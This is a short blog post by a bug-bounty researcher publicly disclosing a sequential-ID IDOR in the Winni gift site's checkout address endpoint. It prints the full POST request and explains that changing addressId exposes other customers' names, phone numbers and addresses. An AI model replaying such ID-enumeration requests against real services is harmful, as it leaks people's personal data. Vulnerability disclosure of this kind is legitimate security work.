Buying A Gift Can Cost You Your PII Data

Almost 1 year ago I reported one PII Data leak to Winni Bug Bounty Program.

After 20+ follow up mail I am disclosing  the issue though Winni  team fixed the issue silently without responding back.

So the issue is a pretty straight forward  IDOR 

 Winni delivers cake and gift to your loved one , while placing the order before payment its ask for the address.

While selecting the address one POST request made to fetch the address in reference to  addressId.

 POST /checkout/adv/address/select-previous HTTP/1.1
Host: www.winni.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 16
Origin: https://www.winni.in
Connection: close
Referer: https://www.winni.in/checkout/adv/address
Cookie: AWSALBTG=XXX

addressId=685945

Alter the addressid value to fetch other user's address along with name and phone number.

As the addressId is sequential an attacker can fetch all address available in the database . Which will result mass PII leaks including data such as names, phone numbers and addresses.

POC


PS- Don't waste your time by reporting their bug bounty program. 


Thanks for reading, any suggestion feedback are welcome

Previous

Next